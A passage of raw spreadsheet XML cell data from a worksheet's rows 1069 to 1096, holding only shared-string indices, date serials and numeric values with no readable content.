      <c r="L1069" t="s">
        <v>83</v>
      </c>
      <c r="M1069" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1069" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="P1069" t="s">
        <v>1795</v>
      </c>
      <c r="Q1069" s="95" t="s">
        <v>3370</v>
      </c>
      <c r="R1069">
        <v>29020</v>
      </c>
      <c r="S1069">
        <v>35802</v>
      </c>
      <c r="T1069">
        <v>42135</v>
      </c>
      <c r="U1069">
        <v>42716</v>
      </c>
      <c r="V1069">
        <v>48721</v>
      </c>
      <c r="W1069" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1070" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1070" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1070" s="52">
        <v>43020.819557442126</v>
      </c>
      <c r="C1070" s="95" t="s">
        <v>2598</v>
      </c>
      <c r="D1070" s="96">
        <v>111</v>
      </c>
      <c r="E1070" s="95" t="s">
        <v>3371</v>
      </c>
      <c r="F1070" s="42">
        <v>100</v>
      </c>
      <c r="G1070" s="95" t="s">
        <v>3372</v>
      </c>
      <c r="H1070" t="s">
        <v>3373</v>
      </c>
      <c r="I1070" t="s">
        <v>185</v>
      </c>
      <c r="J1070" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1070" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1070" t="s">
        <v>83</v>
      </c>
      <c r="M1070" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1070" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="Q1070" s="95" t="s">
        <v>2602</v>
      </c>
      <c r="W1070" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="1071" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1071" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1071" s="52">
        <v>44057.694567280094</v>
      </c>
      <c r="C1071" s="95" t="s">
        <v>3374</v>
      </c>
      <c r="D1071" s="96">
        <v>101</v>
      </c>
      <c r="E1071" s="95" t="s">
        <v>3375</v>
      </c>
      <c r="F1071" s="42">
        <v>100</v>
      </c>
      <c r="G1071" s="95" t="s">
        <v>3376</v>
      </c>
      <c r="H1071" t="s">
        <v>3377</v>
      </c>
      <c r="I1071" t="s">
        <v>103</v>
      </c>
      <c r="J1071" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1071" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1071" t="s">
        <v>77</v>
      </c>
      <c r="M1071" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O1071" s="95" t="s">
        <v>3378</v>
      </c>
      <c r="Q1071" s="95" t="s">
        <v>3379</v>
      </c>
      <c r="W1071" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="1072" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1072" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1072" s="52"/>
      <c r="C1072" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1072" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1072" s="95" t="s">
        <v>3380</v>
      </c>
      <c r="F1072" s="42">
        <v>100</v>
      </c>
      <c r="G1072" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1072" t="s">
        <v>3381</v>
      </c>
      <c r="I1072" t="s">
        <v>82</v>
      </c>
      <c r="J1072" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K1072" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1072" t="s">
        <v>83</v>
      </c>
      <c r="M1072" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1072" t="s">
        <v>2026</v>
      </c>
      <c r="Q1072" s="95" t="s">
        <v>787</v>
      </c>
      <c r="W1072" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1073" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1073" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1073" s="52"/>
      <c r="C1073" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1073" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1073" s="95" t="s">
        <v>3382</v>
      </c>
      <c r="F1073" s="42">
        <v>100</v>
      </c>
      <c r="G1073" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1073" t="s">
        <v>3383</v>
      </c>
      <c r="I1073" t="s">
        <v>156</v>
      </c>
      <c r="J1073" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1073" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1073" t="s">
        <v>77</v>
      </c>
      <c r="M1073" s="95" t="s">
        <v>301</v>
      </c>
      <c r="N1073" t="s">
        <v>476</v>
      </c>
      <c r="P1073" t="s">
        <v>3384</v>
      </c>
      <c r="Q1073" s="95" t="s">
        <v>1607</v>
      </c>
      <c r="W1073" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1074" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1074" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1074" s="52">
        <v>44411.636757743057</v>
      </c>
      <c r="C1074" s="95" t="s">
        <v>3385</v>
      </c>
      <c r="D1074" s="96">
        <v>100</v>
      </c>
      <c r="E1074" s="95" t="s">
        <v>3386</v>
      </c>
      <c r="F1074" s="42">
        <v>100</v>
      </c>
      <c r="G1074" s="95" t="s">
        <v>3387</v>
      </c>
      <c r="H1074" t="s">
        <v>3388</v>
      </c>
      <c r="I1074" t="s">
        <v>185</v>
      </c>
      <c r="J1074" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K1074" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1074" t="s">
        <v>83</v>
      </c>
      <c r="M1074" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1074" s="95" t="s">
        <v>3389</v>
      </c>
      <c r="Q1074" s="95" t="s">
        <v>3390</v>
      </c>
      <c r="T1074">
        <v>1</v>
      </c>
      <c r="V1074">
        <v>36</v>
      </c>
      <c r="W1074" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1075" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1075" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1075" s="52">
        <v>44685.547926840278</v>
      </c>
      <c r="C1075" s="95" t="s">
        <v>3391</v>
      </c>
      <c r="D1075" s="96">
        <v>101</v>
      </c>
      <c r="E1075" s="95" t="s">
        <v>3392</v>
      </c>
      <c r="F1075" s="42">
        <v>101</v>
      </c>
      <c r="G1075" s="95" t="s">
        <v>3393</v>
      </c>
      <c r="H1075" t="s">
        <v>3388</v>
      </c>
      <c r="I1075" t="s">
        <v>185</v>
      </c>
      <c r="J1075" s="95" t="s">
        <v>542</v>
      </c>
      <c r="K1075" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1075" t="s">
        <v>83</v>
      </c>
      <c r="M1075" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1075" s="95" t="s">
        <v>3394</v>
      </c>
      <c r="V1075">
        <v>45</v>
      </c>
      <c r="W1075" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1076" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1076" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1076" s="52">
        <v>44025.550737395832</v>
      </c>
      <c r="C1076" s="95" t="s">
        <v>3395</v>
      </c>
      <c r="D1076" s="96">
        <v>203</v>
      </c>
      <c r="E1076" s="95" t="s">
        <v>3396</v>
      </c>
      <c r="F1076" s="42">
        <v>202</v>
      </c>
      <c r="G1076" s="95" t="s">
        <v>3397</v>
      </c>
      <c r="H1076" t="s">
        <v>3398</v>
      </c>
      <c r="I1076" t="s">
        <v>268</v>
      </c>
      <c r="J1076" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1076" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1076" t="s">
        <v>77</v>
      </c>
      <c r="M1076" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1076" t="s">
        <v>1767</v>
      </c>
      <c r="Q1076" s="95" t="s">
        <v>3399</v>
      </c>
      <c r="R1076">
        <v>3143578</v>
      </c>
      <c r="S1076">
        <v>2956400</v>
      </c>
      <c r="T1076">
        <v>2865356</v>
      </c>
      <c r="U1076">
        <v>3160069</v>
      </c>
      <c r="V1076">
        <v>3697353</v>
      </c>
      <c r="W1076" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1077" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1077" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1077" s="52">
        <v>44252.944052418985</v>
      </c>
      <c r="C1077" s="95" t="s">
        <v>3395</v>
      </c>
      <c r="D1077" s="96">
        <v>301</v>
      </c>
      <c r="E1077" s="95" t="s">
        <v>3396</v>
      </c>
      <c r="F1077" s="42">
        <v>301</v>
      </c>
      <c r="G1077" s="95" t="s">
        <v>3397</v>
      </c>
      <c r="H1077" t="s">
        <v>3398</v>
      </c>
      <c r="I1077" t="s">
        <v>268</v>
      </c>
      <c r="J1077" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1077" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1077" t="s">
        <v>77</v>
      </c>
      <c r="M1077" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1077" t="s">
        <v>1767</v>
      </c>
      <c r="Q1077" s="95" t="s">
        <v>3400</v>
      </c>
      <c r="R1077">
        <v>3143578</v>
      </c>
      <c r="S1077">
        <v>2956400</v>
      </c>
      <c r="T1077">
        <v>2865356</v>
      </c>
      <c r="U1077">
        <v>3160069</v>
      </c>
      <c r="V1077">
        <v>3697353</v>
      </c>
      <c r="W1077" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1078" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1078" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1078" s="52">
        <v>44448.04261384259</v>
      </c>
      <c r="C1078" s="95" t="s">
        <v>3395</v>
      </c>
      <c r="D1078" s="96">
        <v>100</v>
      </c>
      <c r="E1078" s="95" t="s">
        <v>3396</v>
      </c>
      <c r="F1078" s="42">
        <v>100</v>
      </c>
      <c r="G1078" s="95" t="s">
        <v>3397</v>
      </c>
      <c r="H1078" t="s">
        <v>3398</v>
      </c>
      <c r="I1078" t="s">
        <v>268</v>
      </c>
      <c r="J1078" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1078" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1078" t="s">
        <v>77</v>
      </c>
      <c r="M1078" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1078" t="s">
        <v>1767</v>
      </c>
      <c r="Q1078" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1078">
        <v>3143578</v>
      </c>
      <c r="S1078">
        <v>2956400</v>
      </c>
      <c r="T1078">
        <v>2865356</v>
      </c>
      <c r="U1078">
        <v>3160069</v>
      </c>
      <c r="V1078">
        <v>3697353</v>
      </c>
      <c r="W1078" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1079" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1079" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1079" s="52">
        <v>44642.661433657406</v>
      </c>
      <c r="C1079" s="95" t="s">
        <v>3395</v>
      </c>
      <c r="D1079" s="96">
        <v>202</v>
      </c>
      <c r="E1079" s="95" t="s">
        <v>3396</v>
      </c>
      <c r="F1079" s="42">
        <v>201</v>
      </c>
      <c r="G1079" s="95" t="s">
        <v>3397</v>
      </c>
      <c r="H1079" t="s">
        <v>3401</v>
      </c>
      <c r="I1079" t="s">
        <v>268</v>
      </c>
      <c r="J1079" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1079" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1079" t="s">
        <v>77</v>
      </c>
      <c r="M1079" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1079" t="s">
        <v>1767</v>
      </c>
      <c r="Q1079" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R1079">
        <v>3143578</v>
      </c>
      <c r="S1079">
        <v>2956400</v>
      </c>
      <c r="T1079">
        <v>2865356</v>
      </c>
      <c r="U1079">
        <v>3160069</v>
      </c>
      <c r="V1079">
        <v>3697353</v>
      </c>
      <c r="W1079" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1080" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1080" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1080" s="52"/>
      <c r="C1080" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1080" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1080" s="95" t="s">
        <v>3402</v>
      </c>
      <c r="F1080" s="42">
        <v>100</v>
      </c>
      <c r="G1080" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1080" t="s">
        <v>3403</v>
      </c>
      <c r="I1080" t="s">
        <v>75</v>
      </c>
      <c r="J1080" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1080" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L1080" t="s">
        <v>83</v>
      </c>
      <c r="M1080" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N1080" t="s">
        <v>221</v>
      </c>
      <c r="Q1080" s="95" t="s">
        <v>3404</v>
      </c>
      <c r="W1080" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1081" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1081" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1081" s="52"/>
      <c r="C1081" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1081" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1081" s="95" t="s">
        <v>3405</v>
      </c>
      <c r="F1081" s="42">
        <v>100</v>
      </c>
      <c r="G1081" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1081" t="s">
        <v>3406</v>
      </c>
      <c r="I1081" t="s">
        <v>103</v>
      </c>
      <c r="J1081" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1081" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1081" t="s">
        <v>77</v>
      </c>
      <c r="M1081" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P1081" t="s">
        <v>2566</v>
      </c>
      <c r="Q1081" s="95" t="s">
        <v>2567</v>
      </c>
      <c r="W1081" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1082" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1082" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1082" s="52"/>
      <c r="C1082" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1082" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1082" s="95" t="s">
        <v>3407</v>
      </c>
      <c r="F1082" s="42">
        <v>100</v>
      </c>
      <c r="G1082" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1082" t="s">
        <v>3408</v>
      </c>
      <c r="I1082" t="s">
        <v>75</v>
      </c>
      <c r="J1082" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1082" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L1082" t="s">
        <v>77</v>
      </c>
      <c r="M1082" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N1082" t="s">
        <v>91</v>
      </c>
      <c r="Q1082" s="95" t="s">
        <v>3409</v>
      </c>
      <c r="W1082" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1083" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1083" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1083" s="52"/>
      <c r="C1083" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1083" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1083" s="95" t="s">
        <v>3410</v>
      </c>
      <c r="F1083" s="42">
        <v>100</v>
      </c>
      <c r="G1083" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1083" t="s">
        <v>3411</v>
      </c>
      <c r="I1083" t="s">
        <v>75</v>
      </c>
      <c r="J1083" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1083" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L1083" t="s">
        <v>77</v>
      </c>
      <c r="M1083" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N1083" t="s">
        <v>91</v>
      </c>
      <c r="Q1083" s="95" t="s">
        <v>865</v>
      </c>
      <c r="W1083" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1084" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1084" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1084" s="52"/>
      <c r="C1084" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1084" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1084" s="95" t="s">
        <v>3412</v>
      </c>
      <c r="F1084" s="42">
        <v>100</v>
      </c>
      <c r="G1084" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1084" t="s">
        <v>3413</v>
      </c>
      <c r="I1084" t="s">
        <v>103</v>
      </c>
      <c r="J1084" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1084" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1084" t="s">
        <v>77</v>
      </c>
      <c r="M1084" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P1084" t="s">
        <v>772</v>
      </c>
      <c r="Q1084" s="95" t="s">
        <v>3414</v>
      </c>
      <c r="W1084" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1085" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1085" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1085" s="52"/>
      <c r="C1085" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1085" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1085" s="95" t="s">
        <v>3415</v>
      </c>
      <c r="F1085" s="42">
        <v>100</v>
      </c>
      <c r="G1085" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1085" t="s">
        <v>3416</v>
      </c>
      <c r="I1085" t="s">
        <v>75</v>
      </c>
      <c r="J1085" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1085" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L1085" t="s">
        <v>77</v>
      </c>
      <c r="M1085" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N1085" t="s">
        <v>91</v>
      </c>
      <c r="Q1085" s="95" t="s">
        <v>465</v>
      </c>
      <c r="W1085" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1086" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1086" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1086" s="52"/>
      <c r="C1086" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1086" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1086" s="95" t="s">
        <v>3417</v>
      </c>
      <c r="F1086" s="42">
        <v>100</v>
      </c>
      <c r="G1086" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1086" t="s">
        <v>3418</v>
      </c>
      <c r="I1086" t="s">
        <v>196</v>
      </c>
      <c r="J1086" s="95" t="s">
        <v>197</v>
      </c>
      <c r="K1086" s="95" t="s">
        <v>18</v>
      </c>
      <c r="L1086" t="s">
        <v>77</v>
      </c>
      <c r="M1086" s="95" t="s">
        <v>18</v>
      </c>
      <c r="N1086" t="s">
        <v>198</v>
      </c>
      <c r="P1086" t="s">
        <v>242</v>
      </c>
      <c r="Q1086" s="95" t="s">
        <v>3419</v>
      </c>
      <c r="W1086" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1087" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1087" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1087" s="52"/>
      <c r="C1087" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1087" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1087" s="95" t="s">
        <v>3420</v>
      </c>
      <c r="F1087" s="42">
        <v>100</v>
      </c>
      <c r="G1087" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1087" t="s">
        <v>3421</v>
      </c>
      <c r="I1087" t="s">
        <v>82</v>
      </c>
      <c r="J1087" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K1087" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1087" t="s">
        <v>83</v>
      </c>
      <c r="M1087" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1087" t="s">
        <v>2026</v>
      </c>
      <c r="Q1087" s="95" t="s">
        <v>787</v>
      </c>
      <c r="W1087" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1088" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1088" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1088" s="52">
        <v>44449.626449537034</v>
      </c>
      <c r="C1088" s="95" t="s">
        <v>3422</v>
      </c>
      <c r="D1088" s="96">
        <v>101</v>
      </c>
      <c r="E1088" s="95" t="s">
        <v>3423</v>
      </c>
      <c r="F1088" s="42">
        <v>101</v>
      </c>
      <c r="G1088" s="95" t="s">
        <v>3424</v>
      </c>
      <c r="H1088" t="s">
        <v>3425</v>
      </c>
      <c r="I1088" t="s">
        <v>82</v>
      </c>
      <c r="J1088" s="95" t="s">
        <v>32</v>
      </c>
      <c r="K1088" s="95" t="s">
        <v>32</v>
      </c>
      <c r="L1088" t="s">
        <v>83</v>
      </c>
      <c r="M1088" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1088" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q1088" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1088" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1089" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1089" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1089" s="52"/>
      <c r="C1089" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1089" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1089" s="95" t="s">
        <v>3426</v>
      </c>
      <c r="F1089" s="42">
        <v>100</v>
      </c>
      <c r="G1089" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1089" t="s">
        <v>3427</v>
      </c>
      <c r="I1089" t="s">
        <v>103</v>
      </c>
      <c r="J1089" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1089" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1089" t="s">
        <v>77</v>
      </c>
      <c r="M1089" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P1089" t="s">
        <v>2566</v>
      </c>
      <c r="Q1089" s="95" t="s">
        <v>827</v>
      </c>
      <c r="W1089" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1090" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1090" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1090" s="52"/>
      <c r="C1090" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1090" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1090" s="95" t="s">
        <v>3428</v>
      </c>
      <c r="F1090" s="42">
        <v>100</v>
      </c>
      <c r="G1090" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1090" t="s">
        <v>3429</v>
      </c>
      <c r="I1090" t="s">
        <v>103</v>
      </c>
      <c r="J1090" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1090" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1090" t="s">
        <v>77</v>
      </c>
      <c r="M1090" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P1090" t="s">
        <v>246</v>
      </c>
      <c r="Q1090" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W1090" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1091" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1091" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1091" s="52"/>
      <c r="C1091" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1091" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1091" s="95" t="s">
        <v>3430</v>
      </c>
      <c r="F1091" s="42">
        <v>100</v>
      </c>
      <c r="G1091" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1091" t="s">
        <v>3431</v>
      </c>
      <c r="I1091" t="s">
        <v>75</v>
      </c>
      <c r="J1091" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K1091" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1091" t="s">
        <v>77</v>
      </c>
      <c r="M1091" s="95" t="s">
        <v>236</v>
      </c>
      <c r="P1091" t="s">
        <v>909</v>
      </c>
      <c r="Q1091" s="95" t="s">
        <v>3432</v>
      </c>
      <c r="W1091" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1092" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1092" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1092" s="52">
        <v>43790.925171168979</v>
      </c>
      <c r="C1092" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1092" s="96">
        <v>104</v>
      </c>
      <c r="E1092" s="95" t="s">
        <v>3434</v>
      </c>
      <c r="F1092" s="42">
        <v>104</v>
      </c>
      <c r="G1092" s="95" t="s">
        <v>3435</v>
      </c>
      <c r="H1092" t="s">
        <v>1736</v>
      </c>
      <c r="I1092" t="s">
        <v>31</v>
      </c>
      <c r="J1092" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1092" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1092" t="s">
        <v>77</v>
      </c>
      <c r="M1092" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1092" t="s">
        <v>263</v>
      </c>
      <c r="Q1092" s="95" t="s">
        <v>1671</v>
      </c>
      <c r="T1092">
        <v>5247</v>
      </c>
      <c r="U1092">
        <v>7617</v>
      </c>
      <c r="W1092" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="1093" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1093" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1093" s="52">
        <v>44292.085362627316</v>
      </c>
      <c r="C1093" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1093" s="96">
        <v>106</v>
      </c>
      <c r="E1093" s="95" t="s">
        <v>3434</v>
      </c>
      <c r="F1093" s="42">
        <v>106</v>
      </c>
      <c r="G1093" s="95" t="s">
        <v>3435</v>
      </c>
      <c r="H1093" t="s">
        <v>1736</v>
      </c>
      <c r="I1093" t="s">
        <v>31</v>
      </c>
      <c r="J1093" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1093" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1093" t="s">
        <v>77</v>
      </c>
      <c r="M1093" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1093" t="s">
        <v>263</v>
      </c>
      <c r="Q1093" s="95" t="s">
        <v>3436</v>
      </c>
      <c r="W1093" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="1094" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1094" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1094" s="52">
        <v>43790.925171180555</v>
      </c>
      <c r="C1094" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1094" s="96">
        <v>104</v>
      </c>
      <c r="E1094" s="95" t="s">
        <v>3437</v>
      </c>
      <c r="F1094" s="42">
        <v>104</v>
      </c>
      <c r="G1094" s="95" t="s">
        <v>3438</v>
      </c>
      <c r="H1094" t="s">
        <v>3439</v>
      </c>
      <c r="I1094" t="s">
        <v>31</v>
      </c>
      <c r="J1094" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1094" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1094" t="s">
        <v>77</v>
      </c>
      <c r="M1094" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1094" t="s">
        <v>263</v>
      </c>
      <c r="Q1094" s="95" t="s">
        <v>1671</v>
      </c>
      <c r="T1094">
        <v>4919</v>
      </c>
      <c r="U1094">
        <v>7610</v>
      </c>
      <c r="W1094" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="1095" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1095" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1095" s="52">
        <v>44292.085362638885</v>
      </c>
      <c r="C1095" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1095" s="96">
        <v>106</v>
      </c>
      <c r="E1095" s="95" t="s">
        <v>3437</v>
      </c>
      <c r="F1095" s="42">
        <v>106</v>
      </c>
      <c r="G1095" s="95" t="s">
        <v>3438</v>
      </c>
      <c r="H1095" t="s">
        <v>2395</v>
      </c>
      <c r="I1095" t="s">
        <v>31</v>
      </c>
      <c r="J1095" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1095" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1095" t="s">
        <v>77</v>
      </c>
      <c r="M1095" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1095" t="s">
        <v>263</v>
      </c>
      <c r="Q1095" s="95" t="s">
        <v>3436</v>
      </c>
      <c r="W1095" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="1096" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1096" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1096" s="52">
        <v>43790.925171145835</v>
      </c>
      <c r="C1096" s="95" t="s">
        <v>3433</v>
      </c>
      <c r="D1096" s="96">
        <v>104</v>
      </c>
      <c r="E1096" s="95" t="s">
        <v>3440</v>
      </c>
      <c r="F1096" s="42">
        <v>104</v>
      </c>
      <c r="G1096" s="95" t="s">
        <v>3441</v>
      </c>
      <c r="H1096" t="s">
        <v>2850</v>
      </c>
      <c r="I1096" t="s">
        <v>31</v>
      </c>
      <c r="J1096" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1096" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1096" t="s">
        <v>77</v>
      </c>
      <c r="M1096" s="95" t="s">
